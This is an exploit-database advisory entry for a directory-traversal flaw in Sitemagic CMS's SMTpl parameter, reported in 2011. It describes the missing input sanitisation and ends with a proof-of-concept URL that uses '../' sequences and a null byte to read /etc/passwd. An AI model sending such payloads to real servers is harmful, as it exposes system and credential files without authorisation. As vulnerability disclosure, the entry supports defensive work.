Sitemagic CMS - SMTpl Directory Traversal

2011-06-23T00:00:00
ID EXPLOITPACK:E36A4F5F0599B99863E081E20D37D69E
Type exploitpack
Reporter Andrea Bocchetti
Modified 2011-06-23T00:00:00

Description

Sitemagic CMS - SMTpl Directory Traversal

                                        
                                            source: https://www.securityfocus.com/bid/48399/info

Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process. 

http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png